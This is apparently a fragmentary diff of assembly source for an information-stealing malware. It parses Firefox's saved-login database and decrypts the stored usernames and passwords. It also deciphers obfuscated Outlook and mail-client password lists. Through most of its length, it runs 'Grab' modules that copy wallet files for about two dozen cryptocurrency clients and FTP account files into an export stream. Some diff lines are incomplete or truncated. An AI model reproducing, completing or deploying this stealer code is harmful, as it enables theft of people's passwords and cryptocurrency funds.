   dwMozillaActionURLIndex   dd   ?
   dwMozillaPassValueIndex   dd   ?
   dwMozillaUserValueIndex   dd   ?

.code

; Process SQL column definition
SQLiteProcessMozillaColDef proc uses edi column_definition, column_index
   invoke   Trim, column_definition
   invoke   StrStrI, column_definition, offset szSQLiteSpaceChar
   .IF   !eax
   
Line 8102 (code addition):
   mov   byte ptr[eax], 0
   invoke   Trim, column_definition

Line 8105 (code addition/deletion):
   mov   edi, offset szSQLiteStopWords
@@:
   invoke   lstrcmpi, edi, column_definition
   .IF   !eax

Line 8113 (code addition/deletion):
invoke   lstrlen, column_definition
   .IF   !eax

Line 8118 (code addition/remove):
   invoke   lstrcmpi, column_definition, offset szMozillaActionURL
   .IF   !eax
      m2m   dwMozillaActionURLIndex, column_index
      
Line 8123 (code addition/remove):
   invoke   lstrcmpi, column_definition, offset szMozillaPassValue
   .IF   !eax
      m2m   dwMozillaPassValueIndex, column_index

Line 8128 (code addition/deletion):
   invoke   lstrcmpi, column_definition, offset szMozillaUserValue
   .IF   !eax
      m2m   dwMozillaUserValueIndex, column_index

Line 8133 (code addition/deletion):
   mov   eax, TRUE
   ret
SQLiteProcessMozillaColDef endp

; Process password data row
SQLiteProcessMozillaDataTable proc stream, target_stream, row_array, cell_count, item_id
   LOCAL   url_cell_len: DWORD
   LOCAL   url_cell_type: DWORD
   LOCAL   url_cell_data: DWORD
   LOCAL   user_cell_len: DWORD
   LOCAL   user_cell_type: DWORD
   LOCAL   user_cell_data: DWORD
   LOCAL   pass_cell_len: DWORD
   LOCAL   pass_cell_type: DWORD
   LOCAL   pass_cell_data: DWORD
   LOCAL   host: DWORD
   LOCAL   user: DWORD
   LOCAL   pass: DWORD

   .IF   !cell_count

Line 8155 (code addition/deletion):
   mov   eax, cell_count
   .IF   (dwMozillaActionURLIndex < eax) && (dwMozillaPassValueIndex < eax) && (dwMozillaUserValueIndex < eax)
      ; Get cell values
      invoke   SQLiteGetRecordArrayCell, row_array, dwMozillaActionURLIndex, addr url_cell_len, addr url_cell_type, addr url_cell_data
      invoke   SQLiteGetRecordArrayCell, row_array, dwMozillaUserValueIndex, addr user_cell_len, addr user_cell_type, addr user_cell_data
      invoke   SQLiteGetRecordArrayCell, row_array, dwMozillaPassValueIndex, addr pass_cell_len, addr pass_cell_type, addr pass_cell_data

      .IF   url_cell_len && pass_cell_len
         mov   edx, url_cell_len
         inc   edx
         invoke   MemAlloc, edx
         mov   host, eax
         invoke   MoveMem, url_cell_data, host, url_cell_len
      
         mov   user, NULL
         mov   pass, NULL
         
         .IF   mozilla_mode == MOZILLA_MODE_FTP_HTTP
            invoke   lstrlen, offset szMozillaFTP
            invoke   StrCmpNI, host, offset szMozillaFTP, eax
            IFDEF   GRAB_HTTP
            .IF   eax
               invoke   lstrlen, offset szMozillaHTTP
               invoke   StrCmpNI, host, offset szMozillaHTTP, eax
            .ENDIF
            .IF   eax
               invoke   lstrlen, offset szMozillaHTTPS
               invoke   StrCmpNI, host, offset szMozillaHTTPS, eax
            .ENDIF
            IFDEF   COLLECT_PROXY_SETTINGS
            .IF   eax
               invoke   lstrlen, offset szMozillaProxy
               invoke   StrCmpNI, host, offset szMozillaProxy, eax
            .ENDIF
            ENDIF
            ENDIF
         .ELSEIF mozilla_mode == MOZILLA_MODE_FIREFTP
            invoke   lstrlen, offset szMozillaFireFTP
            invoke   StrCmpNI, host, offset szMozillaFireFTP, eax
         .ELSEIF mozilla_mode == MOZILLA_MODE_EMAIL
            sub   eax, eax ; allow all hosts
         .ENDIF
         
         .IF   !eax
            ; user (can be empty for some record types)
            .IF   user_cell_len
               invoke   MozillaNSSDecryptPassword, user_cell_data, user_cell_len
               mov   user, eax
            .ENDIF
            
            ; pass
            invoke   MozillaNSSDecryptPassword, pass_cell_data, pass_cell_len
            mov   pass, eax
            
            .IF   host && pass
               ; export recovered data
               invoke   StreamWriteDWORD, target_stream, item_id
               invoke   StreamWriteString, target_stream, host
               invoke   StreamWriteString, target_stream, user
               invoke   StreamWriteString, target_stream, pass
            .ENDIF
         .ENDIF
         
         invoke   MemFree, user
         invoke   MemFree, pass
         invoke   MemFree, host
      .ENDIF

Line 8225 (code addition/deletion):
   ret
SQLiteProcessMozillaDataTable endp

SQLiteProcessMozillaSchemaTable proc stream, target_stream, row_array, cell_count, item_id
   LOCAL   cell_len: DWORD
   LOCAL   cell_type: DWORD
   LOCAL   cell_data: DWORD
   LOCAL   table_name: DWORD
   LOCAL   root_page: DWORD
   LOCAL   dwStatusCode: DWORD

   .IF   cell_count == 5
      ; Validate table column count
      invoke   SQLiteGetRecordArrayCell, row_array, 2, addr cell_len, addr cell_type, addr cell_data
      .IF   cell_type == SQLITE_DATATYPE_STR
         m2m   table_name, cell_data
         invoke   lstrcmpi, table_name, offset szMozillaLoginTable
         .IF   !eax
            invoke   SQLiteGetRecordArrayCell, row_array, 0, addr cell_len, addr cell_type, addr cell_data
            .IF   cell_type == SQLITE_DATATYPE_STR
               invoke   lstrcmp, offset szSQLite3TableType, cell_data
               .IF   !eax
                  invoke   SQLiteGetRecordArrayCell, row_array, 3, addr cell_len, addr cell_type, addr cell_data
                  .IF   cell_type == SQLITE_DATATYPE_INT
                     mov   eax, cell_data
                     m2m   root_page, dword ptr[eax]
                     
                     invoke   SQLiteGetRecordArrayCell, row_array, 4, addr cell_len, addr cell_type, addr cell_data
                     .IF   cell_type == SQLITE_DATATYPE_STR
                        mov   dwMozillaActionURLIndex, -1
                        mov   dwMozillaPassValueIndex, -1
                        mov   dwMozillaUserValueIndex, -1

                        invoke   SQLiteProcessSQL, cell_data, offset SQLiteProcessMozillaColDef
                        mov   dwStatusCode, TRUE
                        
                        .IF   (dwMozillaActionURLIndex != -1) && (dwMozillaPassValueIndex != -1) && (dwMozillaUserValueIndex != -1)
                           invoke   SQLiteReadPage, stream, target_stream, root_page, addr dwStatusCode, item_id, offset SQLiteProcessMozillaDataTable
                        .ENDIF
                     .ENDIF
                  .ENDIF
               .ENDIF   
            .ENDIF
         .ENDIF
      .ENDIF
      
Line 8271 (code deletion):
mov   dwSQLiteEncoding, eax etc....

Line 8272 (code edit):
SQLiteProcessMozillaSchemaTable endp

Line 8272 (code edit):
ProcessMozillaSQLiteFile proc target_stream, szSQLFileName, item_id

Line 8280 (code addition):
, item_id, offset SQLiteProcessMozillaSchemaTable

Line 8290 (code edit/removal):
ProcessSQLiteFile endp -> ProcessMozillaSQLiteFile endp
ChromeAppDataCommonSingleFileScan procedure deleted.

Line 8299 (comment added):
; Tested: Google Chrome 29.0.1547.66 m

Line 8374 (code edit):
ProcessSQLiteFile -> ProcessChromeSQLiteFile
Line 8375 (code edit):
ProcessSQLiteFile -> ProcessChromeSQLiteFile

Line 9307 (procedure rename, check Line 198):
         invoke   IsDataAlreadyProcessed, map.lpMem, map.dwFileSize

Line 10932 (code addition):
   mov   byte ptr[CWindowsMailPasswordList+1], 'P'
   mov   byte ptr[CWindowsMailSMTPPass+1], 'S'

Line 11392 (code addition):
   mov   byte ptr[CIncrediMailSMTPServer], 'S'
   mov   byte ptr[CIncrediMailSMTPPort], 'S'
   mov   byte ptr[CIncrediMailSMTPUser], 'S'
   mov   byte ptr[CIncrediMailSMTPPass], 'S'

Line 11622 (code deletion):
base_path, do_decrypt <- (removed 'do_encrypt')

Line 11734 (code deletion):
reg_key, S, 0 <- (removed '0')

Line 11959 (code addition):
   .IF   bListEncrypted
      mov   bListEncrypted, FALSE
      invoke   DecipherList, offset COutlookRegValues
      invoke   DecipherList, offset COutlookBinaryValues
      invoke   DecipherList, offset COutlookPassValues
      invoke   DecipherList, offset COutlookPassValues2
   .ENDIF

Line 12087 (code addition):
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bitcoin
; http://bitcoin.org
; Tested: 0.8.1-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_BITCOIN

.data
   CBitconWalletFile      db   'wallet.dat',0
   CBitcoinAppDataDir      db   '\Bitcoin',0

.code

GrabBitcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_BITCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CBitcoinAppDataDir, offset CBitconWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabBitcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Electrum
; http://electrum.org/
; Tested: 1.7.3
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_ELECTRUM

.data
   CElectrumWalletFile      db   'electrum.dat',0
   CElectrumAppDataDir      db   '\Electrum',0

.code

GrabElectrum proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_ELECTRUM, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CElectrumAppDataDir, offset CElectrumWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabElectrum endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; MultiBit
; http://multibit.org
; Tested: 0.5.9
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_ELECTRUM

.data
   CMultiBitWalletFile      db   '.wallet',0
   CMultiBitAppDataDir      db   '\MultiBit',0

.code

GrabMultiBit proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_MULTIBIT, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CMultiBitAppDataDir, offset CMultiBitWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabMultiBit endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; FTP Disk
; Tested: ver 1.2
; SFTP: implemented

IFDEF COMPILE_MODULE_FTPDISK

.data
   CFTPDiskAccountsFile   db   'Accounts.ini',0
   CFTPDiskAppDataDir      db   '\Maxprog\FTP Disk',0

.code

GrabFTPDisk proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FTPDISK, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CFTPDiskAppDataDir, offset CFTPDiskAccountsFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFTPDisk endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Litecoin
; https://litecoin.org/
; Tested: v0.8.5.1-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_LITECOIN

.data
   CLitecoinWalletFile      db   'wallet.dat',0
   CLitecoinAppDataDir      db   '\Litecoin',0

.code

GrabLitecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_LITECOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CLitecoinAppDataDir, offset CLitecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabLitecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Namecoin
; http://namecoin.info/
; Tested: 0.3.72
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_LITECOIN

.data
   CNamecoinWalletFile      db   'wallet.dat',0
   CNamecoinAppDataDir      db   '\Namecoin',0

.code

GrabNamecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_NAMECOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CNamecoinAppDataDir, offset CNamecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabNamecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Terracoin
; http://www.terracoin.org/
; Tested: v0.8.0.2
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_TERRACOIN

.data
   CTerracoinWalletFile      db   'wallet.dat',0
   CTerracoinAppDataDir      db   '\Terracoin',0

.code

GrabTerracoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_TERRACOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CTerracoinAppDataDir, offset CTerracoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabTerracoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bitcoin Armory
; https://bitcoinarmory.com/
; Tested: Version 0.90-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_BITCOINARMORY

.data
   CBitcoinArmoryWalletFile   db   '.wallet',0
   CBitcoinArmoryAppDataDir   db   '\Armory',0

.code

GrabBitcoinArmory proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_BITCOINARMORY, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CBitcoinArmoryAppDataDir, offset CBitcoinArmoryWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabBitcoinArmory endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; PPCoin (Peercoin)
; https://ppcoin.com/
; Tested: v.0.3.0ppc-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_PPCOIN

.data
   CPPCoinWalletFile         db   'wallet.dat',0
   CPPCoinAppDataDir         db   '\PPCoin',0

.code

GrabPPCoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_PPCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CPPCoinAppDataDir, offset CPPCoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabPPCoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Primecoin
; http://primecoin.org/
; Tested: v0.1.2xpm-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_PRIMECOIN

.data
   CPrimecoinWalletFile      db   'wallet.dat',0
   CPrimecoinAppDataDir      db   '\Primecoin',0

.code

GrabPrimecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_PRIMECOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CPrimecoinAppDataDir, offset CPrimecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabPrimecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Feathercoin
; http://feathercoin.com/
; Tested: v0.6.4.4
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_PRIMECOIN

.data
   CFeathercoinWalletFile      db   'wallet.dat',0
   CFeathercoinAppDataDir      db   '\Feathercoin',0

.code

GrabFeathercoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FEATHERCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CFeathercoinAppDataDir, offset CFeathercoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFeathercoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; NovaCoin
; http://novaco.in/
; Tested: v0.4.4.0-g32a928e-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_NOVACOIN

.data
   CNovaCoinWalletFile         db   'wallet.dat',0
   CNovaCoinAppDataDir         db   '\NovaCoin',0

.code

GrabNovaCoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_NOVACOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CNovaCoinAppDataDir, offset CNovaCoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabNovaCoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Freicoin
; http://freico.in/
; Tested: v0.8.3.0-unk-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_FREICOIN

.data
   CFreicoinWalletFile         db   'wallet.dat',0
   CFreicoinAppDataDir         db   '\Freicoin',0

.code

GrabFreicoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FREICOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CFreicoinAppDataDir, offset CFreicoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFreicoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Devcoin
; http://devcoin.org/
; Tested: version 0.3.25.1-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_DEVCOIN

.data
   CDevcoinWalletFile         db   'wallet.dat',0
   CDevcoinAppDataDir         db   '\Devcoin',0

.code

GrabDevcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_DEVCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CDevcoinAppDataDir, offset CDevcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabDevcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Frankocoin
; http://frankos.org/
; Tested: v0.8.4.1-16-g5f1dafe-bet
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_FRANKOCOIN

.data
   CFrankocoinWalletFile         db   'wallet.dat',0
   CFrankocoinAppDataDir         db   '\Franko',0

.code

GrabFrankocoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_FRANKOCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CFrankocoinAppDataDir, offset CFrankocoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabFrankocoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; ProtoShares
; http://invictus-innovations.com/protoshares
; Tested: v0.8.5.0-unk-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_PROTOSHARES

.data
   CProtoSharesWalletFile         db   'wallet.dat',0
   CProtoSharesAppDataDir         db   '\ProtoShares',0

.code

GrabProtoShares proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_PROTOSHARES, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CProtoSharesAppDataDir, offset CProtoSharesWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabProtoShares endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Megacoin
; http://www.megacoin.co.nz
; Tested: v0.8.996.0MEGA-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_MEGACOIN

.data
   CMegacoinWalletFile            db   'wallet.dat',0
   CMegacoinAppDataDir            db   '\Megacoin',0

.code

GrabMegacoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_MEGACOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CMegacoinAppDataDir, offset CMegacoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabMegacoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Quarkcoin
; http://www.quarkcoin.com/
; Tested: v0.8.3.0-g09e437b-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_QUARKCOIN

.data
   CQuarkcoinWalletFile         db   'wallet.dat',0
   CQuarkcoinAppDataDir         db   '\Quarkcoin',0

.code

GrabQuarkcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_QUARKCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CQuarkcoinAppDataDir, offset CQuarkcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabQuarkcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; WorldCoin
; http://worldcoin.in
; Tested: v0.6.4.4-ga7433e7-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_WORLDCOIN

.data
   CWorldCoinWalletFile         db   'wallet.dat',0
   CWorldCoinAppDataDir         db   '\Worldcoin',0

.code

GrabWorldcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_WORLDCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CWorldCoinAppDataDir, offset CWorldCoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabWorldcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Infinitecoin
; http://infinitecoin.com/
; Tested: v1.8.0.0
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_WORLDCOIN

.data
   CInfinitecoinWalletFile         db   'wallet.dat',0
   CInfinitecoinAppDataDir         db   '\Infinitecoin',0

.code

GrabInfinitecoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_INFINITECOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CInfinitecoinAppDataDir, offset CInfinitecoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabInfinitecoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Ixcoin
; http://ixcoin.org/
; Tested: 0.3.24.30-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_IXCOIN

.data
   CIxcoinWalletFile            db   'wallet.dat',0
   CIxcoinAppDataDir            db   '\Ixcoin',0

.code

GrabIxcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_IXCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CIxcoinAppDataDir, offset CIxcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabIxcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Anoncoin
; https://anoncoin.net
; Tested: v0.7.4b-5-gd36ff9d-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_IXCOIN

.data
   CAnoncoinWalletFile            db   'wallet.dat',0
   CAnoncoinAppDataDir            db   '\Anoncoin',0

.code

GrabAnoncoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_ANONCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CAnoncoinAppDataDir, offset CAnoncoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabAnoncoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; BBQcoin
; http://bbqcoin.org/
; Tested: v0.6.3.0-unk-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_BBQCOIN

.data
   CBBQcoinWalletFile            db   'wallet.dat',0
   CBBQcoinAppDataDir            db   '\BBQcoin',0

.code

GrabBBQcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_BBQCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CBBQcoinAppDataDir, offset CBBQcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabBBQcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Digitalcoin
; http://digitalcoin.co/en/
; Tested: v1.0.0.0-g3aaa7ba-beta
; SFTP: not supported
                                               
IFDEF COMPILE_MODULE_DIGITALCOIN

.data
   CDigitalcoinWalletFile            db   'wallet.dat',0
   CDigitalcoinAppDataDir            db   '\Digitalcoin',0

.code

GrabDigitalcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_DIGITALCOIN, 0
   mov   hdr_ofs, eax
   
   invoke   AppDataCommonFileScan, stream, offset CDigitalcoinAppDataDir, offset CDigitalcoinWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabDigitalcoin endp

ENDIF

